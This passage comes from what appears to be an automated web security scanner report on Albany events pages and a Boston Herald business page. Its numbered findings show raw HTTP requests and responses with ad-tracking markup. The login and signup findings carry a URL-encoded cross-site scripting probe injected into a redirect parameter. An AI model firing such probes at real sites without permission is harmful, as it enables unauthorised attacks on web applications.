<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">

<!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY -->
<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
<a id="rotation_prev" href="#"><img alt="Previous event" src="http://js.zvents.com/images/icons/orange_rev.gif?65617" title="Previous event" /></a>
...[SNIP]...
pt:void(0)" id="featured_rotation_pause" onclick="$ZJQuery('#featured_rotation').cycle('pause'); $ZJQuery('#featured_rotation_play').show(); $ZJQuery('#featured_rotation_pause').hide(); return false;"><img alt="Pause event slideshow" src="http://js.zvents.com/images/icons/orange_pause.gif?65617" title="Pause event slideshow" /></a>
...[SNIP]...
ed_rotation_play" onclick="$ZJQuery('#featured_rotation').cycle('resume'); $ZJQuery('#featured_rotation_play').hide(); $ZJQuery('#featured_rotation_pause').show(); return false;" style="display: none"><img alt="Resume event slideshow" src="http://js.zvents.com/images/icons/orange_play.gif?65617" title="Resume event slideshow" /></a>
<a id="rotation_next" href="#"><img alt="Next event" src="http://js.zvents.com/images/icons/orange_ff.gif?65617" title="Next event" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/139733045-pink-floyd-experience" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:139733045', false, this)"><img alt="Pink Floyd Experience" src="http://www.zvents.com/images/internal/0/2/0/9/img_459020_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155300665-celtic-woman" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:155300665', false, this)"><img alt="Celtic Woman" src="http://www.zvents.com/images/internal/7/3/2/5/img_155237_primary.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/147270025-glenn-beck" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:147270025', false, this)"><img alt="Glenn Beck" src="http://www.zvents.com/images/internal/5/2/8/3/img_8063825_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/142549185-lisa-lampanelli" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:142549185', false, this)"><img alt="Lisa Lampanelli" src="http://www.zvents.com/images/internal/8/0/5/4/img_74508_primary.jpg?resample_method=resized" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:148455425', false, this)"><img alt="Sesame Street Live Elmos Green Thumb" src="http://www.zvents.com/images/internal/5/2/3/8/img_8188325_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/151637365-riverdance" onclick="return Zvents.tracker.notifyFeaturedClick('event:151637365', false, this)"><img alt="Riverdance" border="0" src="http://www.zvents.com/images/internal/7/6/5/8/img_348567_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/154912025-mike-epps-and-friends" onclick="return Zvents.tracker.notifyFeaturedClick('event:154912025', false, this)"><img alt="Mike Epps And Friends" border="0" src="http://www.zvents.com/images/internal/6/4/1/8/img_868146_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour" onclick="return Zvents.tracker.notifyFeaturedClick('event:155222925', false, this)"><img alt="Keith Urban - Get Closer 2011 World Tour" border="0" src="http://www.zvents.com/images/internal/5/8/6/4/img_8914685_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/152086945-harlem-globetrotters" onclick="return Zvents.tracker.notifyFeaturedClick('event:152086945', false, this)"><img alt="Harlem Globetrotters" border="0" src="http://www.zvents.com/images/internal/5/8/9/0/img_2640985_thumb.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab" onclick="return Zvents.tracker.notifyFeaturedClick('event:161856385', false, this)"><img alt="A very special acoustic &amp; electric evening with Trey Anastasio &amp; TAB" border="0" src="http://www.zvents.com/images/internal/2/3/2/7/img_287232_thumb.jpg?resample_method=resized" /></a>
...[SNIP]...
733045-pink-floyd-experience" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:139733045'
, 1, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ow/142549185-lisa-lampanelli" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:142549185'
, 2, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/147270025-glenn-beck" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:147270025'
, 3, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
treet-live-elmos-green-thumb" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:148455425'
, 4, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/151637365-riverdance" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:151637365'
, 5, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
2086945-harlem-globetrotters" alt="Buy Tickets" name="&amp;lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:152086945'
, 6, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/162869785'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/163938585'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/164180885'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
</a> | <a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false" class="fLinks">Privacy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false" class="fLinks">User Agreement</a>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/albany-ny/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.187. http://events.cbs6albany.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /search?city=Albany&st=event HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:39:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 324
ETag: "ab5a3071ee3ad0868c747506099c1399"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ECIJY2l0eSILQWxiYW55IgtyYWRpdXNpNyINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0FsYmFueSwgTlkiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy03My43NTUwOTk5OTk5OTk5OTkATWoiEXdoZXJlX3N0cmluZ0AZIgpzdGF0ZSIHTlk%3D--d0710e9458c36d53e23b3e7a161be20e00b58652; path=/; expires=Fri, 29-Apr-2011 05:39:06 GMT; HttpOnly
Content-Length: 49568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Search results" />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>


<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>


<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">

<!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY -->
<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
yd-experience" class="serp_click_1 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:139733045', '1', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
65-riverdance" class="serp_click_2 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:151637365', '2', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
11-world-tour" class="serp_click_3 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:155222925', '3', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
25-glenn-beck" class="serp_click_4 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:147270025', '4', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
sa-lampanelli" class="serp_click_5 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:142549185', '5', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
s-green-thumb" class="serp_click_6 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:148455425', '6', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
-celtic-woman" class="serp_click_7 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:155300665', '7', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
s-and-friends" class="serp_click_8 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:154912025', '8', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
anastasio-tab" class="serp_click_9 event_detail_link sc-serp-buytixico" name="&amp;lid=serpClick&amp;lpos=event" onclick="return Zvents.tracker.notifySearchClick('event:161856385', '9', false, this);"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a> | <a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false" class="fLinks">Privacy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false" class="fLinks">User Agreement</a>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/albany-ny/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.188. http://events.cbs6albany.com/user/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /user/login

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:37:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
Location: https://secure.zvents.com/elx/events_cbs6albany_com/user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=b71a65ab3c5801c999573056dcd1eff9::f18e24d227addce5e2c56a738c0710b8
X-Runtime: 5
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:37:32 GMT; HttpOnly
Content-Length: 298

<html><body>You are being <a href="https://secure.zvents.com/elx/events_cbs6albany_com/user/login?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&amp;elxt=b71a65ab3c5801c999573056dcd1eff9::f18e24d227addce5e2c56a738c0710b8">redirected</a>
...[SNIP]...

17.189. http://events.cbs6albany.com/user/signup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /user/signup

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:37:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
Location: https://secure.zvents.com/elx/events_cbs6albany_com/user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&elxt=6f4282717780dcc19a72c2c0ec55f078::1ed9edb1f0b57dc67f45ebdf738c5ace
X-Runtime: 5
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:37:18 GMT; HttpOnly
Content-Length: 299

<html><body>You are being <a href="https://secure.zvents.com/elx/events_cbs6albany_com/user/signup?return_to=%2F%3F376e5%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Ea7771aeaee3%3D1&amp;elxt=6f4282717780dcc19a72c2c0ec55f078::1ed9edb1f0b57dc67f45ebdf738c5ace">redirected</a>
...[SNIP]...

17.190. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="/homepage.bg">
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News &amp; Opinion</a>
...[SNIP]...
<div id="sports" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tabSelected"><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos &amp; Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">Homefind</a>
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">Jobfind</a>
...[SNIP]...
